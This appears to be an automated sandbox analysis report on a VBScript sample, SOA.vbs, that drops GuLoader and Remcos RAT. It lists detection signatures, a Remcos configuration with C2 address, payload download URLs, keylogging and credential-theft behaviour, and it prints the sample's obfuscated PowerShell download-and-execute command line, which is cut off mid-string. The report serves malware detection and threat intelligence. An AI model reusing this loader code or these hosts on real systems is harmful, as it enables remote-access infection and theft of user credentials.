Windows Analysis Report
SOA.vbs

Overview

General Information

Sample name: SOA.vbs
Analysis ID: 1465863
MD5: 5eb7f6fdbef3c0d5203a8a04a09f2b39
SHA1: 6931cbc28345d13ca66694f5059c05d4f8889f73
SHA256: 9bb93f41ee5ed09fe6ad9c7c150dbc06280ee08f746d9a1ac9da501d7ad53c9e
Tags: GuLoaderRATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Found malware configuration
Source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara detected Remcos RAT
Source: Yara match File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1726081150.0000000008390000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf source: powershell.exe, 0000000E.00000002.1723632726.000000000741D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 0000000E.00000002.1723632726.00000000073BF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_245710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 17_2_245710F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_24576580 FindFirstFileExA, 17_2_24576580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040AE51 FindFirstFileW,FindNextFileW, 20_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 23_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 24_2_00407898

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 103.237.87.32
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49708 -> 103.237.87.32:1999
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Teentsier.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mbLXhRfFSSN77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: global traffic HTTP traffic detected: GET /Teentsier.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mbLXhRfFSSN77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.2
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.23
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.8
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.2
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.24
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E81AD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/T
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Te
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Tee
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teen
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teent
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teents
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsi
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsie
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier.
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier.l
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier.lp
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier.lpk
Source: powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier.lpkP
Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/Teentsier.lpkXR
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/mbLXhRfFSSN77.bin
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/mbLXhRfFSSN77.binH
Source: powershell.exe, 00000002.00000002.1870759337.0000019E81E28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237H
Source: wscript.exe, 00000000.00000003.1240291201.0000029D2C485000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/P=
Source: wscript.exe, 00000000.00000002.1251228154.0000029D2A54E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A53F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A542000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251228154.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1240917817.0000029D2A59B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1240544273.0000029D2C472000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241218710.0000029D2A5C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e2409bf0730a6
Source: wscript.exe, 00000000.00000002.1251228154.0000029D2A54E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A53F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A542000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enh
Source: wscript.exe, 00000000.00000003.1240917817.0000029D2A59B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241218710.0000029D2A5C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e2409bf073
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpG
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpI
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpL
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpS
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpi
Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpj
Source: powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe String found in binary or memory: http://www.ebuddy.com
Source: wab.exe String found in binary or memory: http://www.imvu.com
Source: wab.exe String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 20_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 20_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 20_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 23_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 23_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 24_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 24_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 24_2_004072B5

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_7368.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 720, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9731
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9731
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9731 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9731 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
